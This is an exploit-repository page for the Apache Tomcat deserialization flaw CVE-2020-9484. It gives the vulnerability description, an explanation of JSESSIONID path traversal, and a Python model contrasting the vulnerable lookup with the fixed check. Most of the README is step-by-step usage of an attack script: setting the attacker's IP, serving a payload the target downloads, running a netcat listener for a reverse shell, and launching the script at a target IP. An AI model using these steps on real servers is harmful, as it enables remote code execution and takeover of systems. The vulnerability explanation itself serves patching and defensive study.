
CVE-2020-9484 PoC — Apache Tomcat code issue vulnerability

Associated Vulnerability

Title: Apache Tomcat code issue vulnerability (CVE-2020-9484)

Description: When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103, if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker-provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.
Readme
# Remote Code Execution Exploit in Apache Tomcat 9.0.27

Apache Tomcat 9.0.27 is vulnerable to remote code execution (CVE-2020-9484). The affected ranges are 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103; the fix shipped in 10.0.0-M5, 9.0.35, 8.5.55 and 7.0.104. Tested on Kali 2020.4 and JDK 8. This bash script is a simple proof of concept, for educational purposes only.

## Description

The vulnerability allows a remote attacker to execute arbitrary code on the target system with the privileges of the Tomcat process.

A Tomcat instance configured with the PersistenceManager and a FileStore writes sessions to disk as Java serialized objects, one file per session, named `<session id>.session` inside the store directory. When a request carries a JSESSIONID cookie for a session that is not in memory, the manager asks the FileStore to load it, and the affected versions build the file path from the cookie value without rejecting path separators. A cookie such as `JSESSIONID=../../../../tmp/evil` therefore makes Tomcat open and deserialize `/tmp/evil.session`. If that file holds a serialized gadget chain (for example one generated with ysoserial) and the session attribute class-name filter does not block the gadget classes, the deserialization runs attacker-chosen code.

Successful exploitation may result in complete compromise of the vulnerable system, but it requires that the server is configured to use the PersistenceManager with a FileStore, that the attacker can place a file with a `.session` suffix on the server, and that the attacker knows its path relative to the store directory. The payload does not have to be uploaded through Tomcat itself; any write primitive on the host (an upload feature, a shared directory, a log file with a controlled name) satisfies the condition.
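
The following is an added example and not code from this repository or from Tomcat: a Python model of how the FileStore turns a session id into a file path, placed beside the check that the fixed releases perform (the canonical path of the computed file must stay inside the canonical store directory). The store directory, the planted file location and the session ids are constructed for the demonstration; the real store directory is relative to the application's work directory under `$CATALINA_BASE/work`.

```python
import os

# Suffix Tomcat's FileStore appends to a session id to build the file name.
SESSION_EXT = ".session"

# Constructed store directory for this example (not a real default path).
STORE_DIR = "/srv/tomcat-demo/work/Catalina/localhost/ROOT"


def vulnerable_session_file(store_dir, session_id):
    """Model of the pre-fix behaviour: the id taken from the JSESSIONID cookie
    gets ".session" appended and is joined to the store directory with no
    validation, so "../" sequences in the id walk out of the store."""
    return os.path.join(store_dir, session_id + SESSION_EXT)


def hardened_session_file(store_dir, session_id):
    """Model of the fixed behaviour: the canonical path of the candidate file
    must lie inside the canonical store directory; otherwise the id is
    rejected and no file is opened."""
    candidate = os.path.join(store_dir, session_id + SESSION_EXT)
    store_real = os.path.realpath(store_dir)
    candidate_real = os.path.realpath(candidate)
    if os.path.commonpath([store_real, candidate_real]) != store_real:
        return None
    return candidate_real


def traversal_id(store_dir, target_without_ext):
    """Session id an attacker sends to reach an absolute path on the host:
    enough "../" to climb from the store to "/", then the target path with
    its ".session" suffix left off, because FileStore adds the suffix."""
    depth = len([p for p in os.path.normpath(store_dir).split(os.sep) if p])
    return "../" * depth + target_without_ext.lstrip("/")


def demo():
    """Returns (crafted id, file the vulnerable code opens,
    whether the fix rejects it, whether a normal id still works)."""
    sid = traversal_id(STORE_DIR, "/tmp/downloadPayload")
    opened_by_vulnerable = os.path.normpath(vulnerable_session_file(STORE_DIR, sid))
    rejected_by_fix = hardened_session_file(STORE_DIR, sid) is None
    normal_id_ok = hardened_session_file(STORE_DIR, "6C2D7E8A") is not None
    return sid, opened_by_vulnerable, rejected_by_fix, normal_id_ok


if __name__ == "__main__":
    for label, value in zip(("id", "opened", "rejected", "normal ok"), demo()):
        print(f"{label}: {value}")
```

The crafted id does not need the exact depth of the store directory: once the path has reached `/`, further `../` components are absorbed, so an attacker can over-estimate the depth and still land on the planted file.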

## Requirements

In order to use the script, [ysoserial](https://github.com/frohoff/ysoserial) is needed. To install it:

`cd /opt && git clone https://github.com/frohoff/ysoserial`

`cd /opt/ysoserial && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-master.jar`

If you already have ysoserial installed, make sure the jar is named "ysoserial-master.jar" and lives in /opt/ysoserial, because the script looks for it there.

## Installation

To install the script, type:

`cd /opt && git clone https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh`

## Help menu

To open the help menu, type:

`./CVE-2020-9484.sh --help`

or

`./CVE-2020-9484.sh -h`


## How to use it

First, open the script and place your own IP address at line 14:

`remote_ip="10.10.16.180" 	# change this`

This script creates the files "payload.sh", "downloadPayload.session", "chmodPayload.session" and "executePayload.session" in the directory you run it from. The `.session` suffix matters: it is what the FileStore appends to a session id, so the crafted JSESSIONID names the file without it. The target fetches payload.sh over HTTP, so start a simple web server on port 80 in the same directory (Python 3 example):

`sudo python3 -m http.server 80`

Also start a netcat listener on port 4444 to catch the connection from payload.sh:

`nc -nvlp 4444`

Now run the script with the IP address of the target system you want to attack:

`./CVE-2020-9484.sh target-ip`

## Troubleshooting

If it does not work, make sure you are running ysoserial on JDK 8. To check which version you use, type:

`java -version`

Payload generation may fail on JDK 12 or later because ysoserial relies on reflective access that newer JDKs restrict. Read more about it [here](https://github.com/frohoff/ysoserial/issues/107).
File Snapshot

[4.0K] /data/pocs/2c0a1bdeee31bb4d1735cc04b6a3602cf0803897
├── [4.9K] CVE-2020-9484.sh
├── [ 272] install.txt
├── [ 34K] LICENSE
└── [2.4K] README.md

0 directories, 4 files